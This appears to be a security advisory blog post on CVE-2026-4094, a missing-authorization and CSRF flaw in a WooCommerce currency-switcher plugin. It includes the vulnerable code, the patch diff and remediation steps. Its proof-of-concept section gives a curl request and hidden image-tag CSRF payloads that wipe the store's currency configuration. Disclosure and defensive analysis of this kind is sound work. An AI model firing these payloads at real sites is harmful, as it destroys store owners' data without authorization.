FOX – Currency Switcher Professional for WooCommerce WordPress plugin banner

CVE-2026-4094: FOX Currency Switcher Config Deletion (CVSS 8.1)

Updated 5 min read

CVE-2026-4094 is a CVSS 8.1 (High) Missing Authorization vulnerability in the FOX – Currency Switcher Professional for WooCommerce WordPress plugin. An authenticated attacker with Contributor-level access can wipe the entire multi-currency configuration by appending a single GET parameter to any wp-admin page. Because no nonce is checked, the vulnerability is also exploitable via Cross-Site Request Forgery against any administrator.

Vulnerability Summary

FieldValue
Plugin NameFOX – Currency Switcher Professional for WooCommerce
Plugin Slugwoocommerce-currency-switcher
CVE IDCVE-2026-4094
CVSS Score8.1 (High)
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
Vulnerability TypeMissing Authorization
Affected Versions<= 1.4.5
Patched Version1.4.6
PublishedMay 14, 2026
ResearcherRen Voza
Wordfence AdvisoryLink

Description

The FOX – Currency Switcher Professional for WooCommerce plugin stores all multi-currency settings — custom currencies, exchange rates, and configuration — in a single WordPress option named woocs. This option is the heart of the plugin. If it is deleted, the entire configuration is lost.

The vulnerable code adds a reset trigger directly inside the admin_head WordPress action. Any user who can load a wp-admin page can fire this trigger. There is no capability check and no nonce.

Because of this, a Contributor can delete the configuration with a single HTTP request. At the same time, an attacker who cannot log in can still cause the deletion by tricking an administrator into visiting a malicious page — the browser will automatically send the request.

Technical Analysis

Hook Registration

The WOOCS class registers the admin_head() method in its constructor:

// classes/woocs.php, line 426 (v1.4.5)
add_action('admin_head', array($this, 'admin_head'), 1);

WordPress fires the admin_head action on every admin page load, for every authenticated user who can reach the wp-admin backend. Contributors have this access by default.

Vulnerable Function

// classes/woocs.php, lines 1167–1170 (v1.4.5)
public function admin_head() {
    if (isset($_GET['woocs_reset'])) {
        delete_option('woocs');
    }
    // ... (script enqueue logic below)
}

The function checks only that the woocs_reset GET parameter exists. It does not call current_user_can() to verify the user’s role. It does not call wp_verify_nonce() to confirm the request came from a trusted form.

What delete_option('woocs') Destroys

The woocs WordPress option holds the entire currency configuration array. The get_currencies() method reads it at line 1728:

// classes/woocs.php, line 1728 (v1.4.5)
$currencies = get_option('woocs', array());

if (empty($currencies) OR !is_array($currencies) OR count($currencies) < 2) {
    $currencies = $this->prepare_default_currencies();
}

When the option is deleted, get_currencies() falls back to prepare_default_currencies(). This replaces all custom currencies with a hardcoded two-currency default. All custom exchange rates, currency symbols, and pricing rules are gone.

CSRF Vector

Because no nonce is verified, the exploit works across origins. An administrator who visits a page containing the following HTML will unknowingly trigger the deletion:

<img src="https://victim-site.com/wp-admin/index.php?woocs_reset=1" width="1" height="1">

The browser sends the request with the administrator’s session cookies. WordPress fires admin_head, and the configuration is deleted — with no indication to the victim.

Proof of Concept

Disclaimer: This proof of concept is provided for educational and defensive research purposes only. Do not test on systems you do not own or have explicit written permission to test.

Prerequisites

  • WordPress site with FOX – Currency Switcher Professional for WooCommerce <= 1.4.5 installed and active.
  • For the direct exploit: attacker account with at least Contributor-level access.
  • For the CSRF exploit: any page an administrator can be lured to visit.

Step 1 — Direct Exploit (Contributor account)

# Replace SITE, and COOKIE with actual values
curl -v "https://SITE/wp-admin/index.php?woocs_reset=1" \
  -H "Cookie: wordpress_logged_in_HASH=CONTRIBUTOR_SESSION_COOKIE"

A 200 OK response confirms the request was processed. The woocs option is now deleted.

Step 2 — Verify the Deletion

Log into the WordPress admin and navigate to WooCommerce → Settings → Currencies (or the FOX Currency Switcher tab). All custom currencies will be gone, replaced by the default two-currency setup.

Alternatively, check the database directly:

wp option get woocs
# Expected after exploit: Option 'woocs' is not set.

CSRF Exploit (No Login Required)

<!-- Attacker hosts this on any web page the administrator might visit -->
<img src="https://SITE/wp-admin/index.php?woocs_reset=1"
     width="1" height="1" style="display:none">

When the administrator’s browser loads the image, it sends the authenticated request. The multi-currency configuration is deleted.

Patch Analysis

The fix in version 1.4.6 removes the entire woocs_reset block from admin_head():

// classes/woocs.php
 public function admin_head() {
-    if (isset($_GET['woocs_reset'])) {
-        delete_option('woocs');
-    }
-
     if (isset($_GET['page']) AND isset($_GET['tab'])) {

The developer chose to delete the reset feature entirely rather than add capability or nonce checks. This is the correct approach when a feature has no safe path to authorization. The same changeset (SVN revision 3483839) also fixes a separate SQL injection vulnerability in the currency parameter handling.

Timeline

DateEvent
March 16, 2026Patch committed to SVN (changeset 3483839)
May 14, 2026Wordfence published CVE-2026-4094
May 15, 2026Wordfence advisory last updated
May 18, 2026This post published

Remediation

Update to version 1.4.6 or later. You can do this from WordPress Admin → Plugins → Updates or directly from the wordpress.org plugin page.

If you run a WooCommerce store with multiple currencies and cannot update immediately:

  • Remove Contributor role access to wp-admin as a temporary mitigation.
  • Use a Web Application Firewall rule to block requests to wp-admin URLs containing the woocs_reset parameter.

References

  1. Wordfence Advisory — CVE-2026-4094
  2. CVE Record — CVE-2026-4094
  3. Vulnerable code — classes/woocs.php#L1167
  4. Patch changeset — SVN r3483839
  5. Plugin page — wordpress.org
Share this post: X / Twitter LinkedIn

If you found this post helpful, consider buying me a coffee. It keeps me writing!

Buy Me A Coffee